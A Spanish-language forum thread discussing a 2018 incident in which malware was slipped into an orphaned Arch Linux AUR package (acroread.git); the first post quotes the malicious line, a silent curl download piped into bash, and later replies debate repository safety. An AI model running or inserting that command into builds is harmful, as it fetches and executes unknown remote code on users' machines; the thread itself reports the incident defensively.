El libre pensamiento para un internet libre

No estas registrado.  

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#1 12-07-2018 20:22:05

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,123

Malware encontrado en repositorios comunitarios AUR para Arch Linux

Se ha encontrado un malware en los repositorios AUR de Arch Linux
¿Qué pensar al respecto?

aur_virus_2.jpg

Encontrar un virus en unos repositorios para distribución GNU-Linux es (afortunadamente) extremadamente raro. 
Podemos hablar en este caso de un epifenómeno porque no estamos hablando de los repositorios "oficiales" de Arch Linux
Los repositorios oficiales de Arch Linux, los que están mantenidos por el equipo de desarrollo, son los repositorios "pacman". 
Los repositorios AUR están mantenidos por la comunidad de usuarios de Arch Linux.
Es fundamental recordar esto: Usar otros repositorios que los repositorios de nuestra distribución supondrá siempre un riesgo.   

  Pasa lo mismo en debian (kali y ubuntu etc...) con los repositorios oficiales y los repositorios "ppa" (non oficiales) que podemos añadir para instalar una aplicación fuera de los repositorios de nuestra distribución. 
Debemos hacerlo solo con software de confianza y personalmente prefiero prescindir totalmente de ellos, no añado ppa. .

  El malware en cuestión ha sido introducido el 7 de julio por un tal xeactor
No era un malware dañino en si.
Tiraba de curl para mandar afuera información colectada sobre el ordenador.
  Su CPU , entre otras cosas.
  Era muy probablemente la fase uno del plan de xeactor
  Se ha pillado a este mismo xeactor en el mercado android colocando malwares para minar bitcoins.
  CPU - Bitcoins...  ¡Elemental mi querido Watson!  El muy listo colectaba información para infectar ordenadores con minadores de criptomonedas.   
 
  La pregunta que queda en suspenso es ¿Son seguros estos repositorios AUR?
Cabe decir que son los repositorios non-oficiales más seguros que haya (hablando de todas las distribuciones)
Será el primer caso de malware encontrado y se ha detectado de inmediato.
El paquete infectado se ha quedado tan solo 9 horas.
Lo que ha levantado sospechas es que en la ultima actualización del paquete se ha añadido un linea de código curl (utilidad para descargar o subir datos)
El paquete en cuestión se llama acroread.git y era orfanato, es decir, el paquete se ha marcado como obsoleto por un largo tiempo.
Xeactor ha aprovechado esto para hacerse por pasar por un buen samaritano que quería darle una segunda vida a este paquete.
Podéis ver a continuación la modificación que ha levantado sospechas:

aur_virus_1.jpg

 

curl -s https://ptpb.pw/~x|bash -&

  curl está invocado en modo "silencioso" (opción -s).
Se ejecuta un script en pipe sin saber los comandos empleados (wtf? uno pam ) y todo esto se hace desde/hacía una web externa con un dominio basura (wtf? dos pam )
  Una de las grandes calidades de estos repositorios alternativos es que permiten revisar todos los cambios lo que hace imposible esconder algo mucho tiempo.
  Hay que decir también que no creo que muchos tienen a este paquete viejo y sin interés, creo incluso que no ha recogido... ningunos datos.
Este paquete es para instalar... Adobe PDF reader en Linux (wtf? tres big_smile )
Existen muchas alternativas de código libre  y disponibles desde los repositorios oficiales,
  Es bueno recordar que para nuestra seguridad debemos siempre privilegiar los softwares instalados desde nuestros repositorios oficiales y debemos siempre privilegiar las soluciones de código libre,

  En todos casos este incidente no desacredita a los repositorios AUR ni mucho menos.
Siempre habrá un cretino (hay que ser un idiota para usar el mismo nick para atacar a dos objetivos diferentes tongue)  para intentar aprovecharse del funcionamiento abierto de unos repositorios comunitarios basados en la libre colaboración. 
El malware estaba en un paquete muy viejo, sin mantenimiento desde tiempo, diseñado para una tarea... que no tiene sentido (¿Quien coño usa adobe pdf reaver en linux? big_smile )
La reacción fue inmediata y el malware, es importante repetirlo, se quitó en menos de nueve horas.
Todo esto ilustra más bien la eficiencia y el nivel de seguridad insuperable del funcionamiento en código libre.
   Los repositorios AUR, a pesar de ser abiertos y mantenido por la comunidad, son muchísimo, pero que muchísimo,  más seguros que el mercado android que tiene a toda la maquinaría google detrás.

  Referencias

Desconectado

Anuncio

Wifi-highpower.es es distribuidor oficial de Alfa Network

#2 12-07-2018 20:32:35

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 478

Re: Malware encontrado en repositorios comunitarios AUR para Arch Linux

(hay que ser un idiota para usar el mismo nick para atacar a dos objetivos diferentes tongue)

Desgraciadamente nunca se está exento de idiotas. neutral

Pero hay algo de esta noticia que no me deja buen sabor de boca,,y es la facilidad que hay para meter virus en casi cualquier (cosa). hmm   

Ultima edición por josep345 (12-07-2018 20:34:57)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Conectado

#3 12-07-2018 21:45:17

kcdtv
Administrator

Registrado: 14-11-2014
Mensajes: 4,123

Re: Malware encontrado en repositorios comunitarios AUR para Arch Linux

Cualquier cosa... ¡Menos unos repositorios oficiales GNU-Linux! cool
Imposible que pase algo similar por apt (si no añades ppa)  (en debian y derivados) o mediante pacman (en arch linux).
Debería dejarte buen sabor en boca ver que unos repositorios comunitarios abiertos a [email protected] son millones de veces más seguros que cualquier market google, windows o IOS. wink
El paquete malicioso era obsoleto, para una tarea idiota, se ha visto enseguida y estoy seguro que nadie ha sido afectado.
Lo que debería dejar mal sabor de boca es usar códigos cerrados dónde desconocemos del todo el código... La ilusión de seguridad es la peor cosa. Ver y entender es el mejor remedio.

Desconectado

#4 12-07-2018 23:02:18

josep345
Usuario

Registrado: 19-11-2017
Mensajes: 478

Re: Malware encontrado en repositorios comunitarios AUR para Arch Linux

Cualquier cosa... ¡Menos unos repositorios oficiales GNU-Linux!

Si, eso ya me quedo claro,pero seamos realistas,,nadie nos puede garantizar la seguridad al 100%.

Ultima edición por josep345 (13-07-2018 11:46:29)


Debes Aprender que puedes hacer Todo bien y aun así fallar.

Creación Alargador USB-3.0 Con Cable RJ45   

Conectado

Anuncio

Wifi-libre.com: El libre pensamiento para un internet libre / Regístrese ahora

Temas similares

Tema Respuestas Vistas Ultimo mensaje
4 22975 Hoy 11:04:02 por kcdtv
124 1400 Hoy 09:29:40 por Xavi
1 500 Ayer 20:13:19 por kaniete
Pegado:
Pegado:: 1ª Sorteo Del Mercadillo por josep345  [ 1 2 3 8 ]
187 4426 Ayer 17:12:19 por Nolose
83 13879 16-07-2018 14:08:26 por kcdtv

Pie de página

Información del usuario

Ultimo usuario registrado: guidofawkes
Usuarios registrados conectados: 1
Invitados conectados: 7

Conectados: josep345

Estadisticas de los foros

Número total de usuarios registrados: 1,067
Número total de temas: 1,093
Número total de mensajes: 10,993

Máx. usuarios conectados: 69 el 15-10-2017 09:23:21